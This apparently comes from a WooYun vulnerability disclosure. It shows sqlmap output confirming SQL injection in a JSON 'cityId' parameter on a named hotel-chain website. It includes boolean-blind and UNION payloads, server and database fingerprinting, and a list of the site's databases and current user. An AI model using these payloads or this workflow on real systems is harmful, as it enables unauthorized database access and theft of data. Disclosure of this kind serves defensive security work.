WooYun.org

直接祭出sqlmap，跑的结果：
数据库：
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: (custom) POST
Parameter: JSON #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"cityId":"1100' AND 5885=5885 AND 'wYQY'='wYQY"}
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"cityId":"1100' UNION ALL SELECT NULL,CHAR(113)+CHAR(101)+CHAR(100)+CHAR(98)+CHAR(113)+CHAR(90)+CHAR(122)+CHAR(67)+CHAR(69)+CHAR(98)+CHAR(112)+CHAR(87)+CHAR(110)+CHAR(77)+CHAR(107)+CHAR(113)+CHAR(102)+CHAR(103)+CHAR(118)+CHAR(113),NULL-- "}
---
[15:10:47] [INFO] testing MySQL
[15:10:47] [WARNING] the back-end DBMS is not MySQL
[15:10:47] [INFO] testing Oracle
[15:10:47] [WARNING] the back-end DBMS is not Oracle
[15:10:47] [INFO] testing PostgreSQL
[15:10:48] [WARNING] the back-end DBMS is not PostgreSQL
[15:10:48] [INFO] testing Microsoft SQL Server
[15:10:48] [INFO] confirming Microsoft SQL Server
[15:10:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:10:48] [INFO] fetching database names
available databases [5]:
[*] JJWEB
[*] master
[*] model
[*] msdb
[*] tempdb
当前用户：
[15:11:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:11:58] [INFO] fetching current user
current user: 'WEB-DB-WEB'
[15:11:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.jinjianginns.com'